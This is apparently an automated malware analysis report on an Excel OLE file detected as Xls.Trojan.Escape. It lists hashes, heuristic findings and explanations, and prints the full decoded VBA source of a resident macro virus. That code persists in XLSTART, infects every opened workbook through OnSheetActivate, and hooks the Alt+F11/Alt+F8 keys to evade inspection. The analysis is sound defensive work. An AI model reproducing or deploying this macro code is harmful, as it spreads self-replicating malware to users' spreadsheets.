Office (OLE) malware analysis — malicious · d19b75404cabc101

MALICIOUS

Office (OLE)

18.0 KB Created: 2012-09-07 06:06:53 Authoring application: Microsoft Excel First seen: 2014-02-28

MD5: 18c739f3b358ce6a92f77664a665d6ee SHA-1: 614ce5e64be6747faa729e55059c533a9b788589 SHA-256: d19b75404cabc101d80f3d96ddce67f1001cf27efb10188370734e855f0c2a6f

268 Risk Score

Heuristics 6

ClamAV: Xls.Trojan.Escape-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Escape-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
  Application.OnSheetActivate = "StartUp.xls!ycop"
```
VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION

The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
Matched line in script
```
  Application.OnKey "%{F11}", "StartUp.xls!escape"
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3602 bytes
SHA-256: `08befe42dcaa24d3e0a8173891a9e5c39ef9ab30ddbf7fa5247d2c314868e0fb`
Detection ClamAV: Xls.Trojan.Escape-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "StartUp" Sub auto_open() Dim i As Single On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save 'Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!ycop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.Calculation = xlCalculationManual ' On Error Resume Next ' On Error GoTo 0 Worksheets("barcode").ComboBo x2.Clear Worksheets("barcode").ComboBox2.AddItem "MDM20" Worksheets("barcode").ComboBox2.AddItem "MDQ70" Worksheets("barcode").ComboBox2.AddItem "MDM21" Worksheets("barcode").ComboBox2.AddItem "MDM20Z" Worksheets("barcode").ComboBox2.AddItem "MDT10" Worksheets("barcode").ComboBox2.AddItem "MDS90" Worksheets("barcode").ComboBox1.Clear Worksheets("barcode").ComboBox1.AddItem "ﾐﾂLOT" ' Worksheets("barcode").ComboBox3.Clear ' For i = 2 To Worksheets("sequence").[a65536].End(xlUp).Row ' Worksheets("barcode").ComboBox3.AddItem Worksheets("sequence").Cells(i, 1) ' Next i Dim MyArray(280, 3) 'ｵﾚﾒｻｸﾐｱ暠�ｺｬﾈｸｾﾝﾁﾐ Worksheets("barcode").ListBox1.ColumnCount = 3 'ｵﾚｶｸ�ｺｬﾁｾﾝﾁﾐ For i = 0 To 280 MyArray(i, 0) = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Cells(i + 4, 8) MyArray(i, 1) = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Cells(i + 4, 6) MyArray(i, 2) = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Cells(i + 4, 7) Next i ' MyArray = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Range("F4:H" & Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").[a65536].End(xlUp).Row) ' MyArray = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Range("f4:h9") Worksheets("barcode").ListBox1.List() = MyArray ' ListBox2.Column() = MyArray Rem arr = Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Range("F4:H" & Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").[a65536].End(xlUp).Row) Rem ListBox1.AddItem Worksheets("ﾈｫｹ､ｳﾌ｣ｨZPT｣ｩ").Cells(i, 6) End Sub Sub ycop() On Error Resume Next If ActiveWorkbook.Sheets(1).name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub escape() On Error Resume Next Application.OnSheetActivate = "StartUp.xls!back" Application.OnKey "%{F11}" Application.OnKey "%{F8}" Application.SendKeys "%{F11}" Application.SendKeys "%{F8}" For Each book In Workbooks Application.DisplayAlerts = False If book <> "StartUp.xls" Then book.Sheets("StartUp").Delete Next For Each book In Workbooks If book.name = "StartUp.xls" Then book.Close End If Next End Sub Sub back() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!ycop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!ycop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.